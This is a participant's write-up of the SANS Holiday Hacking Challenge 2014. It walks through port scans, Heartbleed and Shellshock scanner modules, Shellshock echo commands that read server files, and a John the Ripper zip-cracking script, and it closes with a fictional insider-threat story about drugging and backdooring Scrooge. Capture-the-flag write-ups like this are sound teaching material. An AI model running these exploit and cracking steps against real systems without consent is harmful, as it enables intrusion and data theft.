A Christmas Hacking Carol

Transcription

A Christmas Hacking Carol
SANS Holiday Hacking Challenge 2014
“A Christmas Hacking Carol”
Report Created:
Sunday, January 4, 2015
Suave Security
Web: http://www.SuaveSecurity.com
E-mail: [email protected]
Office: +1 641-715-3900 ext. 556377#
SANS Holiday Hacking Challenge 2014
Table of Contents
Executive Summary
1
Attack Narrative
2
The Ghost of Hacking Past
2
Task #1: Time to say hello to Eliza
2
Task #2: Surf the Internet together
3
The Ghost of Hacking Present
4
Task #1: Heartbleed
4
Task #2: Shellshock
5
The Ghost of Hacking Future
6
Task #1: Analyze hhusb.dd.bin
6
Task #2: Analyze LetterFromJackToChuck.doc
6
Task #3: Analyze hh2014-chat.pcapng
8
Task #4: Analyze hh2014-chat.pcapng_Bed_Curtains.zip
9
Task #5: Analyze Tiny_Tom_Crutches_Final.jpg
11
Conclusion
12
The Real Story
13
SANS Holiday Hacking Challenge 2014
Executive Summary
Suave Security took on the task of identifying what steps Scrooge went through in order to
obtain 7 secret messages. We had Scrooge’s consent to investigate the following IP
addresses:


173.255.233.59
23.239.15.124
o (http://www.scrooge-and-marley.com) ports 80 / 443 only
Efforts were taken to provide as much detail as possible so that the steps could be easily
repeatable. Throughout the investigation we discovered evidence that led us to question a
Mr. Bob Cratchit. The story he provided to us can be found in the “Real Story” section at the
bottom of this report. We have yet to go to the authorities with this information.
Written By: Joshua Tomkiel
Copyright 2014
Page 1 of 17
SANS Holiday Hacking Challenge 2014
Attack Narrative
The Ghost of Hacking Past
The Ghost of Hacking Past, Mr. Alan Turing, gave this hint to Scrooge:
“Before I depart, I’d like to introduce you to an old friend of mine. She’s at
173.255.233.59 and has an important message to share with you, Scrooge. Feel
free to connect with her, surf the Internet together, and see if you can discover
her secret.”
Task #1: Time to say hello to Eliza
First, I ran a port scan to see what services were running:
root@kali:~# nmap 173.255.233.59 -A -T4 -p 1-65535
The high port, 31124 seems interesting, lets see if I can get any banner information:
root@kali:~#nc 173.255.233.59 31124
Here is Eliza. She’s a chat bot that responds to keywords such as “turing”, “turing
machine”, “secret”, and “enigma”.
If you type “secret” or “enigma” 3 times, you’ll get the next tip.
But the most interesting trigger of all was the “surf to” command. Time to dig deeper.
Written By: Joshua Tomkiel
Copyright 2014
Page 2 of 17
SANS Holiday Hacking Challenge 2014
Task #2: Surf the Internet together
Eliza holds a secret. In order to discover it, I had to “surf the Internet with her.” I spun up a
virtual Ubuntu server instance on Amazon’s EC2 free hosting tier, installed Apache and
setup a test page. I then issued the following command to Eliza:
“surf to http://54.68.208.14/index.html”
My basic website on Amazon EC2
I was also tailing the Apache access.log file at the same time:
tail –f /var/log/apache2/access.log
The following entry appeared in the log:
173.255.233.59 - - [28/Dec/2014:14:35:44 +0000] "GET /index.html HTTP/1.1"
200 283 "-" "Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: "Machines take me
by surprise with great frequency. -Alan Turing""
Initially I thought that I could use her as a proxy but I was looking into it too much. After
hours of attempting different ways to get her to actually go to a URL, I ultimately told her
what she was asking for.
Eliza Secret: "Machines take me by surprise with great frequency.
-Alan Turing"
Written By: Joshua Tomkiel
Copyright 2015
Page 3 of 15
SANS Holiday Hacking Challenge 2014
The Ghost of Hacking Present
The Ghost of Hacking Present, Johnny Long, gave this hint to Scrooge:
“I've magically introduced two special secrets on your very own company website,
www.scrooge-and-marley.com. Those secrets should shock your heart, teaching
you important lessons for all time."
http://www.scrooge-and-marley.com is vulnerable to Shellshock and Heartbleed.
Task #1: Heartbleed
root@kali:~#use auxiliary/scanner/ssl/openssl_heartbleed
Data leaked:
0for%20in%20the%20very%20air%20through%20which%20this%20Spirit%20moved%20it%20seemed%
20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%2
0black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form
%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20B
ut%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20fr
om%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it
%20was%20surrounded.%20&Website%20Secret%20%231=Hacking%20can%20be%20noble%2ek
Website Secret #1: Hacking can be noble.
Written By: Joshua Tomkiel
Copyright 2015
Page 4 of 15
SANS Holiday Hacking Challenge 2014
Task #2: Shellshock
root@kali:~#use auxiliary/scanner/http/apache_mod_cgi_bash_env
This was challenging since only ECHO and PWD commands received responses. I had to
figure out within ECHO how to change directories, print the current directory, distinguish
files from directories and finally, read the contents of a file.
Read the secret file:
echo $(cd /; pwd; while read line; do echo $line; done <secret)
Show only directories:
echo $(cd /; pwd; for f in */; do echo "$f"; done)
Changing directories and list current directory:
echo $(cd ..; cd ..; cd ..; pwd; for f in *; do echo "$f"; done)
Website Secret #2: Use your skills for good.
Written By: Joshua Tomkiel
Copyright 2015
Page 5 of 15
SANS Holiday Hacking Challenge 2014
The Ghost of Hacking Future
The Ghost of Hacking Future left Scrooge without any hints:
“It was shrouded in a deep black garment, which concealed its head, its face, its
form, and left nothing of it visible save one outstretched hand. That hand bore a
device the Ghoul proffered to Scrooge, a single USB thumb drive bearing untold
secret horrors.”
Task #1: Analyze hhusb.dd.bin
I ran strings on the .bin file to see if there was anything that jumped out at me. After
parsing through the entire print out, I attempted to mount the .bin file by changing the file
extension to .iso. However, not all files were displayed:
Extracting the .bin file with 7-ZIP on a Windows VM showed everything I needed and more:
Task #2: Analyze LetterFromJackToChuck.doc
Written By: Joshua Tomkiel
Copyright 2015
Page 6 of 15
SANS Holiday Hacking Challenge 2014
I transferred the extracted folder back to my Kali VM and ran strings on the Word
document:
strings -16 LetterFromJackToChuck.doc | uniq
The secret appeared at the bottom of the file:
USB Secret #1: Your demise is a source of mirth.
Written By: Joshua Tomkiel
Copyright 2015
Page 7 of 15
SANS Holiday Hacking Challenge 2014
Task #3: Analyze hh2014-chat.pcapng
I ran strings on the PCAPNG file and found a message with a Base64 encoding string:
"I've just told our children about Mr. Scrooge's death, and all of their faces are brighter for it.
We now have a very happy house. I so love you."
VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg==
Decoded via command line:
USB Secret #2: Your demise is a source of relief.
I also uploaded the file to http://pcapng.com/. This site was able to display the Base64 encoded
string and highlighted an interesting URL:
The URL also sticks out when greping for anything that starts with http, which will come in
handy later…
strings -16 hh2014-chat.pcapng | uniq | grep http
Small sample of output:
Location: http://10.10.10.1:1780/InternetGatewayDevice.xml
Location: http://10.10.10.1/HNAP1/
Location: http://10.10.10.1/HNAP1/
Referer: http://chat.scrooge-and-marley.com/
Referer: http://chat.scrooge-and-marley.com/
Referer: http://chat.scrooge-and-marley.com/
https://code.google.com/p/f5-steganography/
Referer: http://chat.scrooge-and-marley.com/
Referer: http://chat.scrooge-and-marley.com/
Referer: http://chat.scrooge-and-marley.com/
Written By: Joshua Tomkiel
Copyright 2015
Page 8 of 15
SANS Holiday Hacking Challenge 2014
Task #4: Analyze hh2014-chat.pcapng_Bed_Curtains.zip
The zip file was password protected. I ran CeWL on scrooge-and-marley.com to create a
wordlist based on a tip by the Ghost of Hacking past and a tweet:
Source: https://twitter.com/pentesttips/status/544869613662507008
cewl www.scrooge-and-marley.com -w scrooge-and-marley-wordlist.txt
I used the wordlist and the script below to brute force the zip file using John:
http://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/
Code:
#!/bin/bash
echo "ZIP-JTR Decrypt Script";
if [ $# -ne 2 ]
then
echo "Usage $0 <zipfile> <wordlist>";
exit;
fi
unzip -l $1
for i in $(john --wordlist=$2 --rules --stdout)
do
echo -ne "\rtrying \"$i\" "
unzip -o -P $i $1 >/dev/null 2>&1
STATUS=$?
if [ $STATUS -eq 0 ]; then
echo -e "\nArchive password is: \"$i\""
break
fi
done
./zip-jtr.sh hh2014-chat.pcapng_Bed_Curtains.zip scrooge-and-marleywordlist.txt
Archive password is: "shambolic"
Ran strings on the extracted the image “Bed_Curtains.png”:
Written By: Joshua Tomkiel
Copyright 2015
Page 9 of 15
SANS Holiday Hacking Challenge 2014
USB Secret #3: Your demise is a source of gain for others.
Written By: Joshua Tomkiel
Copyright 2015
Page 10 of 15
SANS Holiday Hacking Challenge 2014
Task #5: Analyze Tiny_Tom_Crutches_Final.jpg
Inside the extracted .bin, there was a folder named [DELETED]. Inside that folder, was an
image named “Tiny_Tom_Crutches_Final.jpg”.
Using the F5 steganography tool found from the link found in PCAP file
(https://code.google.com/p/f5-steganography/) I was able to extract the final USB Secret:
java -jar f5.jar x -e secret.txt Tiny_Tom_Crutches_Final.jpg
USB Secret #4: You can prevent much grief and cause much joy.
Hack for good, not evil or greed.
Written By: Joshua Tomkiel
Copyright 2015
Page 11 of 15
SANS Holiday Hacking Challenge 2014
Conclusion
The challenges that Scrooge had to overcome in order to obtain the secret messages ranged
from petty personal attacks (e.g., chats purposely left within a packet capture for him to
find, stating how happy people are now that he’s dead) to downright dangerous remotely
accessible and publicly disclosed exploits which could severely damage his company and
reputation if left unmitigated (Heartbleed and Shellshock). Yes, these, along with the rest of
the challenges covered within this report could have been introduced by three “spirits” as
depicted in “A Christmas Hacking Carol” story. However, I would like to propose an
alternate scenario: a more realistic explanation as to what actually occurred to Scrooge that
Christmas Eve. Evidence has been discovered proving that Scrooge fell victim to an oftenoverlooked threat that is all too common today, the disgruntled employee, otherwise
known as the "insider threat."
Written By: Joshua Tomkiel
Copyright 2015
Page 12 of 15
SANS Holiday Hacking Challenge 2014
The Real Story
Bob Cratchit had worked alongside his wife, Lynn, under Scrooge’s unforgiving iron fist for
many years. Although not directly mentioned in “A Christmas Hacking Carol” story, Bob
was merely an apprentice to Scrooge and eager to learn as much as he could about
anything security related. Bob had a curious mind and when he was not reading up on the
latest exploits and industry news, he would be working in his home lab to develop his own
0-day exploits. Bob’s desk was in the back far corner behind his wife in the Secret Room
connected to Scrooge’s Main Laboratory. Bob was fascinated by genealogy and had been
known to brag about his relation to Dr. Alan Mathison Turing from time to time.
One day, Bob asked Scrooge for professional training to further enhance his exploit
development skills. Just like coal for the fire, training costs money and Scrooge wasn’t
about to pay a penny! He would respond to any training requests with “Bah, Humbug! Just
YouTube it!” Alas, Bob knew that YouTube was no match for the high quality, on-demand
training that the SANS Institute could offer. Defeated and discouraged, Bob sulked back to
his desk. He knew that without additional training, he could never hope to compete with
the likes of Scrooge. Scrooge had made too many powerful connections during his years of
exploit pedaling for Bob to challenge him straight on. Let’s just say Scrooge knew some
people who could make Bob “disappear”. If Bob were to surpass Scrooge, he would have to
have to bring him down to his level. Bob surmised a plan to do just that. He was going to
affect Scrooge in such a way that would make him open to supporting professional growth
and promote a more positive work environment, or he would bring down the company
altogether. It was all going to go down tomorrow, on Christmas Eve.
Much like many unmarried lonely men in their 50’s, Scrooge sought comfort from a bottle
during the holiday season. Bob knew this and used it to his advantage. He planned to spike
Scrooge’s drink with a powerful hallucinogen called Dimethyltryptamine (DTM), when
taken orally has a 90 – 125 minute delay before the effects start kicking in (according to
Wikipedia). Later that afternoon while Scrooge was busy talking with his nephew, who
stopped by the Main Laboratory unannounced, Bob capitalized on the moment to add the
liquid DMT into Scrooge’s cup. No one was the wiser. After Scrooge dismissed his cheerful
nephew, he went back to his desk and continued to drink. Phase 1 was now complete.
The time was approaching 5:00pm and the business day was coming to a close. Bob placed
his hand in his pocket, ensuring that he was still in possession of two small USB flash
drives. One was going to be used to plant malware on Scrooge’s MacBook. The other was to
be used to attack Scrooge on an emotional level during the final phase of his plan.
Scrooge left his MacBook unattended and unlocked as he made some notes in his business
ledger. Bob moved quickly into action. Quietly, he crouched down and slipped in a USB
flash drive that contained custom malware he’d written specifically for this moment.
Within a few seconds, the payload was executed and a backdoor was established to Bob’s
C&C server. This was insurance, just in case things didn’t go as planned.
Written By: Joshua Tomkiel
Copyright 2015
Page 13 of 15
SANS Holiday Hacking Challenge 2014
Exhibit A: A photo taken by Mrs. Cratchit the exact moment Bob Cratchit infected Scrooge’s
MacBook with custom malware while his back was turned. This was posted on Twitter via
Mrs.Cratchit’s account: #Brag #MyManProvides #MacsDontGetViruses
With Scrooge still distracted, Bob connected via SSH with Scrooge’s stored credentials to
the production webserver hosting scrooge-and-marley.com (23.239.15.124). Then, he
downgraded the installed versions of Bash and OpenSSL, making the server vulnerable to
Shellshock and Heartbleed. He had already setup a separate server hosting an Eliza chat bot
to pay homage to his distant cousin, Dr. Alan Mathison Turing. Phase 2 was complete.
Moving on to phase 3, Bob had to make Scrooge’s old exploit machine, Marley, look like it
was back online. Bob located the dusty old server in the Server Room. He noticed that the
Ethernet cable had been crimped by hand and a few of the copper wires were not pushed
all the way in to the RJ45 connector. “Cheap ol’ Scrooge. Couldn’t even spring for some
inexpensive cables from monoprice.com.” Bob muttered to himself. He replaced the cable
with a new one and saw the LED lights start flashing on the NIC. “Layer 1 of the OSI model
is so often overlooked.” Bob previously had been granted SSH access to this server and had
root privileges on this box. He quickly connected and customized the MOTD text to display
a cryptic message for Scrooge when he logged in next time. All that was left was to play the
waiting game. He knew Scrooge was going to run his weekly internal vulnerability scan
shortly. Bob connected his laptop to one of the SPAN ports on the switch and proceeded to
sniff the traffic with WireShark. Patiently, he waited until he saw the SSH connection from
the source of Scrooge’s laptop IP to the destination of Marley’s server IP. An hour passed
Written By: Joshua Tomkiel
Copyright 2015
Page 14 of 15
SANS Holiday Hacking Challenge 2014
by, then it happened! There was the traffic he’d been waiting for! He gave it another 15
seconds, enough time for scrooge to read the message, and then abruptly powered down
Marley. Moments later, Scrooge’s footsteps could be heard as he ran towards the Server
Room. Bob closed his laptop and slid behind one of the server racks. It was evident that the
effects of the hallucinogen had started to take their toll on Scrooge. Scrooge stumbled
approaching the Server Room. Bob witnessed Scrooge wobble in the doorway and prop
himself up against the door, struggling to maintain his balance. Scrooge stared hard into the
room, began to recoil in horror, waved his hands in the air, screamed and ran out the door
towards his bedroom. “Well, that was weird.” Bob thought to himself. Most importantly,
phase 3 was complete.
Phase 4 of the plan was perhaps the most risky of all. Bob was going to actually interact
with Scrooge. Bob laid out three outfits in the Back Office. Each was to present a different
message and challenge to Scrooge. The plan went better than Bob could have ever
imagined, infinitely better! Scrooge was out of his mind the entire time due to the
hallucinogen. It took all Bob had to maintain composure and not burst out laughing as
Scrooge believed every word he said. Bob introduced himself as “The Ghost of Hacking Past
- Dr. Alan Turing”, “The Ghost of Hacking Present - Johnny Long”, and the “Ghost of Hacking
Future” which was really just a big Grim Reaper costume he had from last Halloween.
Scrooge was a changed man after the experience, paying for training whenever it was
requested! Scrooge went on to tell the story of what happened to him that night to anyone
that would listen. Previously, only Mr. and Mrs. Cratchit knew the truth of what happened
that night, and now you do too.
In closing, remember that there will always be new vulnerabilities with nicknames
sprawled across the headlines. However, I implore you to not forget about the threats that
may be already inside your organization, purely waiting for the appropriate moment to
strike.
Written By: Joshua Tomkiel
Copyright 2015
Page 15 of 15